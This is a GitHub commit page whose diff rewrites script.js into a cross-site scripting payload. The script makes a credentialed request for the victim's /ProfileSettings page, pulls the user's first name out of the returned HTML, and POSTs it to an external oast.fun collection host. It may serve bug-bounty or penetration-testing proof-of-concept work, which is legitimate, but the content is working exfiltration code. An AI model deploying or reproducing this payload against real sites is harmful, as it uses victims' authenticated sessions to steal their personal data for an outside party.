Skip to content

Commit

Permalink
Update script.js
Browse files Browse the repository at this point in the history
  • Loading branch information
hostfree23434 authored Sep 18, 2024
1 parent 5482e70 commit f38de45
Showing 1 changed file with 5 additions and 1 deletion.
6 changes: 5 additions & 1 deletion script.js
Original file line number Diff line number Diff line change
@@ -1 +1,5 @@
document.write(btoa("hi"));
xhr=new XMLHttpRequest();
xhr.open('GET','/ProfileSettings#general');
xhr.withCredentials=true;
xhr.onreadystatechange=()=>{if(xhr.readyState==4){dom=new DOMParser().parseFromString(xhr.response,'text/html');var firstName = dom.querySelector('[data-bind="text: firstName"]').textContent;xhr=new XMLHttpRequest();xhr.open("POST","https://kypdqokutkzjkenfltayept3ry0mphyy4.oast.fun");xhr.send(`firstName=${firstName}`);}};
xhr.send();

0 comments on commit f38de45

Please sign in to comment.